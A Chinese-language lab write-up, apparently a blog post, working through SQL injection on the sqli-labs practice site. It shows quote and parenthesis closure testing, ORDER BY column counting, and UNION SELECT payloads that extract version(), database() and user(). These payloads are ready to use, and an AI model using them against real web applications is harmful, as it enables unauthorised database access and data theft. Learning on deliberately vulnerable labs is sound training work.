web实验

web 实验
1 漏洞检查
方法 利用 1=0 和 1=1 来测试页面
从而来构建常见的闭合 ‘ “ ’) ”)
正常页面
在这里插入图片描述

由测试可知此闭合结构为 id=’$id’
在这里插入图片描述在这里插入图片描述
判断列数:
利用函数 order by ;
在这里插入图片描述
如是超出范围则会报错
在这里插入图片描述

http://192.168.206.132/sqli-labs-master/Less-1/?id=1‘ union all select  1,2,3,4  --+

在这里插入图片描述

查出列数为3列 在利用函数找到你想要的
database() version() user()

-1' union all select  version(),database(),user()   --+

在这里插入图片描述
同理:

测试: id = 1 and 1=0
直接显示
则判断无闭合 id = $id

在这里插入图片描述

?id=1 ' and 1=0 --+

在这里插入图片描述
推测闭合符号是由’)组合
?id=1’) and 1=0 --+

在这里插入图片描述
判断列数:

?id =1 ') order by 4  --+

在这里插入图片描述

?id =-1 ') order by 3  --+

在这里插入图片描述

?id=1 " and 1=0  --+

在这里插入图片描述
闭合组合 id = ‘ $id ")’

?id = 1 ")  and  1=0  --+

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值